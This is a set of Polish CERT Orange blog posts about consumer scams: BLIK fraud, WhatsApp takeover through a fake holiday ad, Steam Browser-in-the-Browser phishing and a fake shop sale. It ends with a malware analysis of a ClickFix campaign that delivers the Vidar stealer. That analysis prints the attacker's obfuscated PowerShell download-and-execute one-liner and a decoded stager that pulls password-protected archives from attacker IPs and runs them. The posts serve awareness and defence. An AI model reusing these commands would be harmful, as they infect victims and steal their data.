Do publikacji tego tekstu zainspirował mnie Twitterowy wpis konta @BLIKmobile i jego retweet autorstwa Tomka z bloga Informatyk Zakładowy.

5 tysięcy transakcji BLIK na minutę. Przyjmując 12 sekund na przepisanie kodu po wygenerowaniu, daje to złodziejom szansę 1 na 1000, że losowy kod BLIK jest w danej chwili aktywny.
Moja prognoza: będą próby fraudów realizowane w taki sposób. Uważajcie, co zatwierdzacie w apce. https://t.co/hohkXkqTkT

— Informatyk Zakładowy (@InfZakladowy) August 20, 2025

Czy zatem płatności BLIK są niebezpieczne?

Nie, absolutnie. Ale ta prosta matematyka dowodzi, że realne stają się oszustwa, związane z losowym „strzelaniem” w kod BLIK. Przesada? Absolutnie nie. To już się dzieje, o czym np. pisał kilka miesięcy temu Niebezpiecznik.

Podkreślamy jednak, że to specyficzne ryzyko, w żaden sposób niezwiązane z kontem bankowym, w ramach którego korzystamy z usługi BLIK. Sposób w jaki funkcjonuje Polski Standard Płatności (dalej: PSP) powoduje, że dane dot. konta płatnika trafiają do PSP, ten w kolejnym kroku generuje wyłącznie sześciocyfrowy kod, absolutnie nie powiązany z płatnikiem ani jego kontem.

Co więcej, kod ważny jest jedynie przez 120 sekund. Nawet jeśli ktoś by go podejrzał, musiałby w tym czasie mieć możliwość wykorzystania go do fraudu. Użycie BLIK-a do wypłaty z bankomatu ogranicza możliwość nadużycia niemal do zera. Nawet w przypadku, gdyby na urządzeniu docelowym oszust zainstalował wcześniej skimmer:

• nie wkładamy do bankomatu karty, więc nie ma ryzyka wykradnięcia jej danych (czy fizycznego złośliwego zatrzymania karty, co też się zdarza)
• kod podejrzany ukrytą kamerą w momencie jego wpisania staje się nieważny

Wszystko jest więc dobrze, przy założeniu, że:

• jesteśmy świadomi, jak wygląda proces transakcji BLIK
• zachowujemy w jego kluczowych etapach ostrożność

Na co szczególnie uważać?

Jedną z kluczowych cech wpływających na bezpieczeństwo standardu BLIK jest monit w aplikacji bankowej o potwierdzenie wykonywanej transakcji.

Źródło: mbank.pl

Kluczowe pytanie do każdego z Was – czy korzystając z BLIK-a zawsze upewniacie się co do kwoty i usługodawcy? Czy jednak zdarza się, że zachowujecie się rutynowo i płacąc gdzieś przy użyciu PSP klikacie odruchowo „potwierdzam”, bo przecież:

• właśnie robicie zakupy
• chwilę temu przyjaciel, czy dziecko powiedzieli Wam, że wyślą monit o przelew BLIK

Co więcej – nieco poza tematem tego tekstu – warto też upewnić się, czy znajomy, któremu przelewacie w ten sposób pieniądze, na pewno korzysta z konkretnego numeru telefonu? Tu akurat mogę przytoczyć przykład własny, gdy kolega dopiero po tym, gdy spytałem go, czy dostał ode mnie pieniądze, przypomniał sobie, że BLIK-a ma na inny numer, a na ten jest zarejestrowany ktoś inny.

Zawsze czytaj monity!

Szczególnie, gdy w grę wchodzą Twoje pieniądze. W przypadku przytaczanego banku na zrzucie ekranu wyraźnie widać, co potwierdzamy. Czytanie monitów to podstawa, gdy ktoś usiłuje Cię oszukać „na BLIK-a”. Gdybym to ja Cię poprosił awaryjnie o taki przelew, a na monicie nie zobaczył(a)byś mojego imienia i nazwiska ani numeru telefonu, tylko np. bankomat w Ustrzykach Górnych, czy płatność w sklepie – byłaby to wyraźna czerwona flaga.

Co więcej – nie można wykluczyć sytuacji, w której ktoś zacznie generować serie kodów BLIK licząc, że trafi na kogoś, kto niefrasobliwie nie zwróci uwagi na to, że płaci nie za swoje. A ewentualny zwrot przelanych w ten sposób pieniędzy zależy wyłącznie do dobrej woli odbiorcy. Tymczasem tutaj jeśli zapłacimy komuś za zakupy to nie wiemy komu, a jeśli ktoś nas z premedytacją okrada – to tym bardziej nie odda.

The post Płatności BLIK? Zapamiętaj na co warto uważać appeared first on CERT Orange.

Wakacje już w połowie za nami, ale być może niektórzy jeszcze rozważają dokąd wyjechać. Do takich osób może trafić analizowana przez nas reklama na Facebooku. To krótki film, opatrzony spokojną muzyką i sielskimi obrazkami, pozornie zapraszający do wypoczynku na Mazurach.

Wakacje, jezioro i WhatsApp

Bezkres jeziora, prywatny pomost, 70% zniżki… Ale skąd ten WhatsApp? Być może po prostu właściciel pensjonatu preferuje kontakt przez ten popularny komunikator? Sprawdźmy to:

Zaloguj się, by rozpocząć czat? Z jednej strony teoretycznie nie musi to budzić obaw. Z drugiej jednak – jeśli mamy zainstalowaną aplikację WhatsApp to dlaczego pojawia się jakaś dziwna strona? Jeśli wyrobiliście w sobie odruch przestrzegacie dobrych praktyk bezpieczeństwa, być może zdążyliście już spojrzeć na adres witryny na powyższym zrzucie. I domyślacie się, że whatsloginpl[.]com to nie jest strona komunikatora!

Przede wszystkim zaś instrukcja poniżej nie dotyczy dołączania do czatu. To opis… dołączania urządzenia zewnętrznego do konta WhatsApp! Właściwa strona w przypadku podłączania konta WhatsApp do komputera to https://web.whatsapp.com/, można też skorzystać z aplikacji na PC. W przypadku zaufanego łączenia konta komunikatora z komputerem preferowaną metodą jest kod QR.

Tutaj go nie ma – nawet gdyby oszust go nam wysłał, nie zeskanujemy go telefonem, na którym go otrzymamy. Opis nie opisuje zatem połączenia przy użyciu kodu QR. W miejsce tego precyzuje, by ofiara weszła w „dołączone urządzenia” i wybrała „zamiast tego połącz, używając numeru telefonu”.

Jeśli skopiujemy podany kod i wpiszemy w komunikatorze, nasz WhatsApp de facto wpadnie w ręce oszusta.

Po co kraść dostęp do WhatsApp?

Po to, że da on przestępcy pełny dostęp do wszystkich naszych wiadomości. Przede wszystkim to naruszenie prywatności, de facto wtargnięcie „z drzwiami” do naszej intymności, możliwość przeczytania treści, które zachowujemy dla siebie i rozmówców. Dla oszusta kluczowy jest jednak fakt, że nasz WhatsApp będzie mógł mu służyć do działań przestępczych.

Jak? Choćby w oszustwach „na OLX”, podszywając się pod kupującego, który miał rzekomo zapłacić za towar i podsyła ofierze link do fałszywej strony, skąd wykrada dane karty płatniczej (w wersji optymistycznej) lub logowania do banku (pesymistycznej). Przy odpowiedniej koordynacji działań i nieuwadze ofiara może nawet nie zauważyć, że ktoś korzystał z jej WhatsAppa – jeśli oszust odpowiednio szybko załatwi sprawę i usunie treści.

Jak nie dać się oszukać?

Czytać ze zrozumieniem! Zdaję sobie sprawę, że to może brzmieć brutalnie, ale naprawdę – to, co widać na zrzutach ekranu z WhatsAppem to szczegółowy opis, precyzujący, co będzie się działo! To sytuacja taka, jak w przypadku podłączania nowej aplikacji mobilnej jednego z polskich banków. Dzwoni telefon i IVR kilkukrotnie ostrzega, że łączymy aplikację mobilną z kontem i by rozłączyć się, jeśli ktoś żąda od nas tego PIN-u.

Okno z kodem do WhatsApp to ostatnie, absolutnie największe ostrzeżenie. Mniejsze widać już wcześniej. Reklama pochodzi z konta „Fufng”, z 3 polubieniami, reprezentującego… bar w 17-tysięcznym New Port Richey na przedmieściu Tampy na Florydzie. Jak to się ma do Mazur? No… nijak. To oczywiście tylko jeden z przykładów – nazwy się zmieniają, liczby polubień też, ale schemat regularnie się powtarza.

O czym warto zapamiętać?

• Nie ufaj reklamom, pokazującym (przesadnie) wielkie promocje
• Masz wątpliwości – kliknij w reklamodawcę i sprawdź, czy jego dane mają cokolwiek wspólnego z prezentowaną reklamą
• Ktoś chce od Ciebie loginów, haseł, czy PINów? Sprawdź adres strony, przeczytaj informację do czego są potrzebne te dane?
• Logujesz się do banku i/lub podajesz dane karty płatniczych – rób to wyłącznie na stronach banku, potwierdzonego sklepu lub pod znanym adresem bramki płatniczej

Pamiętaj, że wakacje to czas relaksu, ale bezpieczeństwo Twoich danych jest najważniejsze. Bądźcie czujni i nie dajcie się oszukać.

The post Facebook, wakacje i… przejęcie WhatsApp appeared first on CERT Orange.

Jak cyberprzestępcy przejmują konto Steam? Scenariusz ataku jest wyjątkowo prosty, a przez to niezwykle skuteczny. Zaczyna się od wiadomości z prośbą o zagłosowanie na skórkę broni do Counter Strike’a 2. Dołączony jest do niej link do filmu na YouTube. Sam film wygląda autentycznie. Kluczem jest umieszczony pod materiałem znajduje się komentarz, zachęcający do głosowania, np. taki:

Hello, this is my skin for the CS workshop. I’d be grateful if you could support it with your vote! My workshop link – [link] just press Yes and put some reaction.

Klikając przycisk „Yes” potencjalna ofiara przekierowywana jest do strony logowania. Tam pojawia się fałszywa witryna Steam, przypominająca do złudzenia oryginalny panel usługi. Jeśli niefrasobliwa ofiara nie zwróci uwagi, że to nie jest prawdziwa strona – jej poświadczenia logowania trafią do cyberprzestępców.

Istnieje jeszcze bardziej podstępny wariant tego ataku, wykorzystujący przyzwyczajenia sieciowych graczy. Dużą popularnością cieszy się bowiem wśród nich platforma komunikacyjna Discord. Skąd pomysł na phishing przy jego użyciu? Stąd, że łatwiej uwierzyć w oszustwo, jeśli „napisze do nas znajomy”, którego konto zostało wcześniej przejęte.

Schemat ataku jest równie prosty, co skuteczny. Ofiara otrzymuje wiadomość z linkiem, który wygląda jak legalny adres Steam – na przykład steamcommunity[.]com/gift-card/pay/50. Po kliknięciu okazuje się jednak, że witryna docelowa jest zupełnie inna. To ukryty, skrócony lub phishingowy adres. Discord umożliwia bowiem tzw. osadzenie spoofowanego linku (tzw. spoofowany embed). Jego treść wygląda jak prawdziwa domena, ale faktyczny URL prowadzi w zupełnie inne miejsce.

To nie Steam. To Browser-in-the-Browser

Po wejściu na stronę pojawia się okno logowania do Steam. Wygląda praktycznie identycznie jak prawdziwe – z paskiem adresu, ikoną, a nawet efektami graficznymi imitującymi system operacyjny. W rzeczywistości jest to jedynie graficzna imitacja, stworzona przy użyciu zaawansowanego JavaScript i CSS. Całość – od ramki po pole do wpisania loginu i hasła – okazuje się być elementem strony, a nie rzeczywistym oknem przeglądarki!

Kluczowa dla sukcesu tego ataku technika nosi nazwę Browser-in-the-Browser (BitB, przeglądarka w przeglądarce). Jak widać, przestępcy zadbali o każdy szczegół. Kopiują wygląd paska adresu, stosują odpowiednie ikony i animacje, a nawet symulują zachowanie prawdziwego okna (np. możliwość przeciągania czy zamykania).

To naprawdę dobrze przygotowany atak. Oszustwo jest tak przemyślane, że ofiara, będąc przekonana o autentyczności okna, wpisuje po prostu login i hasło. A dane te trafiają bezpośrednio do przestępców, którzy mogą natychmiast przejąć konto, wyczyścić portfel Steam, sprzedać przedmioty z gier lub wykorzystać konto do kolejnych ataków.

Techniczne aspekty ataku BitB z podszyciem pod Steam

Dlaczego opisywany atak jest skuteczny?

• Realistyczny wygląd strony. Technika BitB pozwala na stworzenie okna logowania nieodróżnialnego od oryginału.
• Socjotechnika. Wiadomość pochodzi często od zaufanego znajomego, którego konto mogło zostać wcześniej przejęte.
• Brak świadomości zagrożenia. Młodzi użytkownicy rzadko sprawdzają dokładny adres URL i nie wiedzą jak rozpoznawać phishingu.
• Spoofowanie osadzanych danych. Discord i inne platformy pozwalają na wstawianie linków, których tekst wygląda jak oficjalny adres, ale faktyczny URL prowadzi do strony phishingowej.

Technika Browser-in-the-Browser polega na wygenerowaniu w przeglądarce okna modalnego, które imituje autentyczne okno logowania. Wykorzystuje się do tego JavaScript i CSS, aby odwzorować każdy szczegół interfejsu – od paska adresu po przyciski systemowe. Atakujący mogą nawet symulować funkcje takie jak przeciąganie czy zamykanie okna.

Całość jest renderowana w ramach jednej strony internetowej. Dzięki temu użytkownik nie opuszcza faktycznie przeglądarki, a jedynie widzi coś, co można określić mianem graficznej iluzji. BitB omija wiele tradycyjnych zabezpieczeń – nawet dwuskładnikowe uwierzytelnianie (2FA) może nie wystarczyć, jeśli przestępcy przejmą aktywną sesję użytkownika.

Jak się bronić?

• Zawsze sprawdzaj rzeczywisty adres URL przed logowaniem. Najedź kursorem na link lub skopiuj go i sprawdź, dokąd prowadzi. W przypadku ataku z wykorzystaniem Browser-in-the-Browser pasek adresu wraz z legalnie wyglądającym adresem również może być wyrenderowany przez skrypt!
• Nie ufaj nawet znajomym, jeśli przesyłają nietypowe linki – ich konto mogło zostać przejęte.
• Zwracaj uwagę na nietypowe domeny, literówki i skracacze linków. Nie ufaj im.
• Korzystaj z dwuskładnikowego uwierzytelniania (2FA). Choć nie daje ono 100% ochrony, znacznie utrudnia przejęcie konta.
• Edukacja i czujność! Znajomość technik takich jak BitB pozwala szybciej rozpoznać zagrożenie.

Ataki z wykorzystaniem Browser-in-the-Browser są wyjątkowo podstępne i trudne do rozpoznania, szczególnie dla młodych użytkowników. Kluczowe jest zachowanie czujności, edukacja oraz stosowanie podstawowych zasad bezpieczeństwa w sieci. Nawet jeśli wiadomość pochodzi od znajomego, każda prośba o logowanie się przez zewnętrzny link powinna zapalić nam mentalną czerwoną lampkę.

Indicators of Compromise (IoC)

store[.]communitycreateshop[.]com
store[.]communitystoregame[.]com
stedmconnmumlty[.]com
clutchmasters[.]pro
meinkunarabcrab[.]com
findtowood[.]com
mfiasibs[.]com

The post Użytkownicy Steam na celowniku – atak Browser-in-the-Browser appeared first on CERT Orange.

Wielokrotnie pisaliśmy już, że Facebook, jako najpopularniejsze miejsce w sieci jest też największym źródłem treści tworzonej przez oszustów. Na czym polega przekręt „na wyprzedaż”? Opiszmy go na świeżym przykładzie, krążącym po Facebooku od poniedziałkowego poranka.

Wyprzedaż z ciężkim sercem

Po 29 wspaniałych latach pełnych pasji do mody (…) żegnamy się z ogromnym żalem. (…) Nadszedł moment, by zamknąć ten rozdział.

Taki dramatyczny przekaz pojawiał się na Facebookowych strumieniach internautów. O jak dużej skali mówimy? W trakcie pisania tego tekstu menedżer reklam pokazywał 81 aktywnych kampanii. Liczba osób, które je zobaczyły, jest oczywiście zależna od budżetu, ale założenie 200 tys. internautów nie jest zawyżone. Być może ten scam zgubiłby się w zalewie innych, gdyby treść, dotycząca mody, nie była okraszona zdjęciami… filiżanek. Ładnych, wyjątkowych, zapewne stworzonych przez AI – ale jednak filiżanek.

Problem? Nie dla internautów. Wystarczy spojrzeć w komentarze, by dowiedzieć się, że wielu z nich zainteresowało się filiżankami na tyle, by nie zwrócić uwagi na czerwone flagi. Istnieje też możliwość, że komentarze napisali oszuści, korzystając z przejętych kont. Jeśli tak było, oznacza to, że niestety w tej materii znacznie się poprawili. Na mnie robiły wrażenie faktycznie naturalnych, wpisanych przez prawdziwych internautów. Jedynym wskaźnikiem, że coś może być nie tak, mogły być emotikony pod zdjęciem.

Sklep, Warszawa, właściciele – AI wymyśli wszystko!

Przyjrzymy się więc dokładniej firmie Mazur Warszawa. Najpierw poszukiwanie w Google – nie ma takiego sklepu, czy też butiku. Jak na „29 lat pełnych pasji do mody” które kończy wyprzedaż, fakt niepozostawienia nawet śladu w internecie jest co najmniej dziwny. Po kliknięciu w link jesteśmy przenoszeni na stronę mazur-warszawa[.]pl. Czyżby jednak firma miała jakąś historię w sieci?

Cóż – nieprzesadnie długą. Niecały miesiąc. Dane abonenta oczywiście niedostępne, witryna założona w irlandzkiej firmie hostującej. Przyglądając się dokładnie stronie szybko trafiamy na zdjęcie przyjaźnie wyglądającej pary seniorów. Stoją przed sklepem, siwy włos – to by pasowało do 29 lat historii. Jeśli jednak mieszkacie w Warszawie to na poniższym zdjęciu na pewno coś Wam pasować nie będzie:

Pominąwszy już sam fakt pewnej nienaturalności/cukierkowości obrazku, takie miejsce nie istnieje. Nigdzie w Warszawie nie znajdziecie takiej lokalizacji. Plan za „właścicielami” nie przypomina żadnej ze stołecznych ulic, robi wrażenie „generycznego”. W stolicy nie ma także miejsca z lampami ulicznymi takimi jak widoczna na pierwszym planie. Ostatnia kwestia – tablice „Mazur Warszawa” wyglądają jak wklejone w Paincie.

Moda, filiżanki, czy… buty?

Skoro mamy już pewność, że mamy do czynienia z oszustami, zobaczmy co można u nich „kupić”? Pytanie jak najbardziej na miejscu, bowiem o ile zaczęliśmy od filiżanek, po jakimś czasie trafiliśmy już na reklamę faktycznie powiązaną z modą, by pół godziny później zobaczyć smutnego… szewca. Wyglądającego zupełnie inaczej niż pan na zdjęciu powyżej.

Wyprzedaż na stronie „Mazur Warszawa” to faktycznie przede wszystkim moda. Wspominane filiżanki też da się znaleźć, ale po bezpośrednim linku – w menu takiej kategorii nie ma. Co wiąże wszystkie oferty? Przede wszystkim oczywiście absurdalnie niskie ceny, co widać poniżej. Ale zauważyliśmy też intrygującą ciekawostkę. Przy każdym produkcie, niezależnie od rozmiaru i koloru, „w magazynie” były wyłącznie trzy sztuki. (zbyt) Wzorcowy przykład wykorzystania socjotechnicznej reguły niedostępności.

Co, gdy zdecydujemy się kupić? Można oczywiście podać numer karty płatniczej, ale sklep dopuszcza też płatność BLIK-iem. Jeśli wybierzemy taką metodę i podamy na stronie kod BLIK, po chwili w aplikacji pojawia się faktycznie nazwa „Mazur Warszawa”. To jest ostatni moment, gdy można kliknąć „rezygnuj”.

Czy to naprawdę wyprzedaż?

Na stronie każdego prowadzonego zgodnie z polskim prawem sklepu powinniśmy znaleźć przynajmniej regulamin i politykę prywatności. Regulaminu nie ma, zaś to, co znajdziemy pod linkiem „polityka prywatności” to jedna strona treści o niczym, zawierająca jedynie powtarzany wielokrotnie adres e-mail. A co z możliwością kontaktu?

Jak widać, „informacje kontaktowe” nie zawierają żadnej metody kontaktu. Jedynym potencjalnym sposobem na dotarcie do właścicieli strony jest powtarzający się na niej wielu miejscach adres e-mail. Kluczowym miejscem, w którym na niego trafimy, wydaje się być podstrona „zwroty i wymiany”. A tam znajdziemy taki fragment:

Ponieważ nasz sklep w Warszawie został na stałe zamknięty, zwroty są teraz obsługiwane przez nasz międzynarodowy magazyn.

Na czym może polegać oszustwo? Być może to mutacja modus operandi modelem opisywanego ok. 3 miesiące temu przez Grzegorza Zembrowskiego. Wtedy paczka faktycznie przyjdzie, będziemy ją mogli nawet odesłać do nadawcy, ale koszty i poświęcony na to czas okażą się niewspółmiernie duże. Być może okaże się po prostu, że dostawa będzie się (wiecznie) przedłużać. Jeśli macie odwagę, możecie sprawdzić sami, tym niemniej – nie polecamy.

The post Nieistniejąca wyprzedaż w sklepie, którego nie ma appeared first on CERT Orange.

ClickFix opisywaliśmy kilkukrotnie w ramach naszego Krajobrazu Zagrożeń, a scenariusze wykorzystania tej techniki za każdym razem były inne. Wykorzystanie tej techniki ma przekonać ofiarę do samodzielnego uruchomienia przede wszystkim Powershella. W efekcie, często przy użyciu wieloetapowego łańcucha infekcji, do użytkownika dostarczane jest złośliwe oprogramowanie. Jego głównym celem jest eksfiltracja danych ze stacji ofiary i przejęcie nad nim kontroli. Stąd w końcowym etapie możemy mieć do czynienia ze stealerami: Vidar, Lumma, DanaBot czy RATami: QuasarRAT, XWorm RAT, VenomRAT, SectopRAT.

Od ClickFix do Vidara

W poniższej kampanii mamy do czynienia z wariantem ClickFix, który dostarcza infostealera Vidar. Elementami wyróżniającymi jest wygląd instrukcji ClickFixa (w graficzny sposób instruuje użytkownika do wykonania poleceń) jak i sama obecność kilku etapów infekcji, dostarczającej wiele plików z szerokiej infrastruktury atakującego.

Rys. 1. Łańcuch infekcji w kampanii.

Łańcuch infekcji możemy opisać w następujący sposób:

1. Do schowka użytkownika automatycznie kopiowane jest polecenie PowerShell po kliknięciu w kontener CAPTCHA na zainfekowanej stronie ClickFixem.
2. Użytkownik korzystając z instrukcji na stronie wkleja polecenie do Uruchom systemu Windows.
3. Polecenie pobiera ze strony was-logistics[.]com skrypt wp.ps1 i wykonuje go.
4. Skrypt jest enkodowany w base64 z UTF-16LE i zawiera w sobie dwa kolejne polecenia PowerShell enkodowane tak samo.
5. Finalnie skrypt pobiera dwa pliki ze strony hxxp://195.10.205[.]75; yrp5.rar oraz UnRAR.exe i zapisuje je w katalogu TEMP użytkownika.
6. Plik UnRAR.exe jest prawdziwym narzędziem od WinRARa i służy do wypakowania pobranego archiwum – jest uruchamiany z parametrem hasła.
7. Archiwum yrp5.rar jest rozpakowywane w folderze TEMP, proces jest zamrażany na 4 sekundy.
8. Archiwum zawiera plik yrp5.txt, który jest wykonywany jako polecenie PowerShell w obrębie poprzedniego procesu (akcja nr. 9 na rysunku).
9. W pliku yrp5.txt zawieraja się kilka poleceń PowerShella, których celem jest: ukrycie wszystkich okna PowerShella i terminala Windowsa, a następnie pobranie ze strony hxxp://5.252.153[.]72 pliku UnRAR.exe i reacter.rar i zapisanie ich do katalogu TEMP.
10. W pliku yrp5.txt znajduje się także polecenie rozpakowania pliku reacter.rar za pomocą UnRAR.exe, tak samo jak w punkcie nr 6 i 7.
11. Powyższe polecenia są wydzielane do pliku yrp5ne.txt i z niego tworzony jest kolejny skrypt yrp5ne.ps1 zapisany w folderze TEMP.
12. Ostatecznie, skrypt yrp5ne.ps1 wykonuje pobranie UnRAR.exe, reacter.rar (akcja nr. 11) wypakowuje archiwum (akcja nr. 12 i 13).
13. Plik z archiwum, build.exe jest wykonywany również w skrypcie yrp5ne.ps1 – na stację zakończono dostarczenie i uruchomienie Vidar Stealera (akcja nr. 14).

Skąd wzięła się infekcja?

Atakujący zidentyfikował strony internetowe, na których istniała możliwość umieszczenia własnej zawartości HTML – najczęściej były to serwisy oparte na WordPressie. W ramach tej aktywności umieścił spreparowaną podstronę o nazwie wp-assets-optimizer.html. Pierwsze przypadki jej zaobserwowania datowane są na 20 czerwca 2025, godz. 18:00 UTC. W kolejnych etapach rozpoczął kampanię, której celem było przekierowywanie potencjalnych ofiar na tę właśnie stronę.

Wykorzystanie zewnętrznych legalnie funkcjonujących serwisów pozwala atakującemu ominąć mechanizmy detekcji oparte na wieku i reputacji domen. Technika ta zmniejsza prawdopodobieństwo wykrycia przez silniki bezpieczeństwa. Dodatkowo serwisy te często działają w zaufanych i wiarygodnych gałęziach TLD (takich jak .com, .org czy .pl), co zwiększa skuteczność socjotechniki i dodatkowo utrudnia wykrycie kampanii.

Podstrona wp-assets-optimizer.html zawiera w skrypt JS, który realizuje interaktywny interfejs użytkownika. Pozornie pełni funkcję weryfikacji typu CAPTCHA, jednak jego rzeczywistym celem jest zainicjowanie złośliwej aktywności przy użyciu socjotechniki. Po załadowaniu strony uruchamiany jest preloader, który dynamicznie ładuje zestaw obrazów (m.in. logo Cloudflare i kilka grafik instruktażowych), z postępem ładowania prezentowanym w formie paska. Po zakończeniu ładowania następuje inicjalizacja głównych komponentów interfejsu – sekcji weryfikacyjnej z dynamicznie generowanym adresem IP i identyfikatorem CAPTCHA, elementami graficznymi imitującymi checkbox, paskiem postępu oraz komunikatami statusowymi.

Rys. 2. CAPTCHA na zainfekowanej stronie

Rys. 3. CAPTCHA na zainfekowanej stronie

Kluczowym elementem o charakterze złośliwym jest funkcja copyToClipboard, która po kliknięciu w kontener CAPTCHA automatycznie kopiuje do schowka polecenie PowerShell:

powershell -c "&(gcM *wr) -uri was-logistics.com/wp.ps1|&(gcm i*x)"

To skrócona, lekko ukryta forma polecenia wykorzystującego Get-Command oraz Invoke-WebRequest, Invoke-Expression (lub ich aliasy gcm oraz iwr, iex) do pobrania i wykonania zdalnego skryptu PowerShell z domeny was-logistics.com. Operacja ta stanowi klasyczny przykład Remote Code Execution via clipboard hijacking, gdzie użytkownik nieświadomie zostaje nakłoniony do wklejenia i wykonania polecenia, prowadzącego do infekcji systemu. Tego typu technika jest trudniejsza do automatycznego wykrycia, ponieważ skrypt sam nie uruchamia złośliwego kodu – przekazuje go jedynie do schowka, pozostawiając wykonanie po stronie użytkownika.

Rys. 4. Kluczowy kod JS wykonujący ClickFix

Dalsze komponenty skryptu, jak podpowiedzi z pomocą klawiaturową (keyboard help), funkcja rotacji grafik, odliczanie czasu ważności CAPTCHA ID oraz efektowne animacje stanu weryfikacji (pasek postępu, ikony sukcesu/porażki) mają na celu uwiarygodnienie interfejsu i zwiększenie skuteczności ataku poprzez elementy perswazyjne. Modal otwierający się automatycznie po 23 sekundach oraz animowana sekwencja obrazów, kończąca się odświeżeniem strony po trzech cyklach, pełnią funkcję psychologicznego nacisku czasowego. Ma on skłonić ofiarę do podjęcia szybkiego działania – czyli wklejenia skopiowanego polecenia.

Rys. 5. Podpowiedzi z pomocą klawiaturową: krok 1

Rys. 6. Podpowiedzi z pomocą klawiaturową: krok 2

Rys. 7. Podpowiedzi z pomocą klawiaturową: krok 3

Całość jest zbudowana w sposób modularny, z obsługą błędów ładowania obrazów, zarządzaniem widocznością elementów interfejsu i imitacją aktywności backendowej, mimo braku rzeczywistego połączenia z żadnym serwerem weryfikacyjnym. Skrypt nie wykonuje żadnych natywnych exploitów w przeglądarce, ale działa w modelu user-assisted execution, który opiera się na zmanipulowaniu użytkownika do uruchomienia wcześniej spreparowanego payloadu. Domena użyta jako źródło skryptu PowerShell (was-logistics[.]com) jest kluczowym wskaźnikiem kompromitacji (IoC).

Z technicznego punktu widzenia skrypt stanowi przykład ukierunkowanego ataku socjotechnicznego wykorzystującego HTML5, DOM API i Clipboard API do uzyskania pierwszego punktu zaczepienia w łańcuchu infekcji. Dalsze fazy ataku (payload, C2) są ukryte poza skryptem i realizowane przez pobierany zdalnie plik wp.ps1.

Dostarczenie złośliwego oprogramowania

Zdalne pobranie i uruchomienie pliku wp.ps1 rozpoczyna łańcuch infekcji.

Rys. 8. Zakodowany skrypt ws1.ps

Skrypt jest zakodowany w base64 i UTF16LE, po jego zdekodowaniu otrzymujemy kolejne wywołanie procesu PowerShella z zakodowanym w ten sam sposób poleceniem.

Rys. 9. Zakodowany skrypt w ws1.ps

Po dekodowaniu, otrzymujemy kolejne zakodowane polecenie wywołania PowerShella:

Rys. 10. Zakodowany skrypt w zakodowanym skrypcie w ws1.ps

Ostatecznie dekodujemy skrypt i otrzymujemy polecenia PowerShella:

Invoke-WebRequest `
  -Uri "hxxp://195.10.205[.]75/uploads/yrp5.rar" `
  -OutFile "$env:TEMP\yrp5.rar"
Invoke-WebRequest `
  -Uri "hxxp://195.10.205[.]75/UnRAR.exe" `
  -OutFile "$env:TEMP\UnRAR.exe"
Start-Process `
  -NoNewWindow `
  -FilePath "$env:TEMP\UnRAR.exe" `
  -ArgumentList `
    "x", `
    "-p7ZyEep6jH33t", `
    "-o+", `
    "$env:TEMP\yrp5.rar", `
    "$env:TEMP"
Start-Sleep -Seconds 4
Get-Content "$env:TEMP\yrp5.txt" | Invoke-Expression

Powyższy skrypt za pomocą Invoke-WebRequest pobiera plik yrp5.rar oraz UnRAR.exe z serwera atakującego: 195.10.205[.]75. Oba pliki zapisywane są w folderze TEMP użytkownika, jako typowa lokalizacja dla stagerów – stąd uruchamiany jest program UnRAR.exe bez wyświetlanego okna. Za jego pomocą ekstraktowany jest zaszyfrowany hasłem 7ZyEep6jH33t plik yrp5.txt z archiwum. Przed uruchomieniem pliku yrp5.txt jako kodu PowerShella, proces usypiany jest na 4 sekundy, aby ukończyć rozpakowywanie archiwum .rar.

Plik yrp5.txt zawiera w sobie dwie zakodowane zmienne $kls oraz $ol, które zawierają w sobie kolejne polecenia PowerShella.

Rys. 11. Zawartość yrp5.txt

Zmienna $kls jest dekodowana i przypisywana do $ofp, a następnie wykonywana za pomocą iex (Invoke-Expression). Zawartość $ofp jest następująca:

Rys. 12. Zdekodowana zawartość $ofp

W wartości zmiennej $ofp możemy zauważyć definicję pomocniczej klasy WinHelp10. Jej głównym celem jest wywołanie funkcji API Windowsa ShowWindow z user32.dll i wywołanie jej na przekazanym procesie – całość zdefiniowana jest w funkcji SwMng. Przyjmuje ona ID procesu wraz z argumentem, który odpowiada za pokazywanie się okna procesu (np.: minimalizacja, maksymalizacja, ukrycie okna). Na końcu skryptu widzimy enumerację procesów PowerShella i Windows Terminala za pomocą Get-Process, a następnie wywołanie na nich kolejno zdefiniowanej funckji SwMng z wartością 0. Dzięki temu każde uruchomione okno wymienionych procesów zostanie ukryte.

Po wykonaniu $ofp, definiowana jest kolejna zmienna, $ol:

Rys. 13. Zdekodowana zawartość $ol

Polecenia te, podobnie jak w przypadku wymienionego wcześniej skryptu, pobierają pliki UnRAR.exe oraz reacter.rar do TEMP i rozpakowują archiwum z hasłem 6o9Rsrfr6UFN4vDQ. Ostatecznie, z TEMP uruchamiany jest wyekstraktowany plik build.exe, będący Vidar Stealerem. Należy wspomnieć, że w obu przypadkach UnRAR.exe był faktycznym narzędziem WinRARa, zgodnym co do hasha, do rozpakowywania archiwów. Dostarczenie go na stację zapewniało, że pobrane archiwa zostaną rozpakowane mimo np.: braku narzędzia u użytkownika.

Rys. 14. Ostatnie linijki pliku yrp5.txt

Zanim jednak to nastąpi, $ol jest dekodowane i umieszczane w pliku yrp5ne.txt w folderze TEMP. Zawartość pliku tekstowego jest kopiowana do pliku yrp5ne.ps1. Za pomocą cmd.exe uruchamiany jest PowerShella z flagą ExecutionPolicy Bypass; przekazywany jest plik yrp5ne.ps1, w wyniku którego uruchamiane są poprzednio opisane polecenia z $ol.

Pakowanie złośliwego kodu w archiwach zabezpieczonych hasłem stanowi skuteczną metodę omijania mechanizmów detekcji. Takie zabezpieczenie uniemożliwia systemom antywirusowym — zarówno na stacjach końcowych, jak i w rozwiązaniach sieciowych — automatyczną analizę zawartości archiwum. Hasło potrzebne do rozpakowania pliku jest przekazywane dynamicznie, zwykle za pomocą polecenia PowerShell, co dodatkowo utrudnia wykrycie zagrożenia na wcześniejszych etapach ataku.

Vidar Stealer

Po analizie można było ustalić, iż komunikuje się on z kanałem na Telegramie, natomiast z profilu Steam pobiera adres IP do swojego serwera Command&Control (C2).

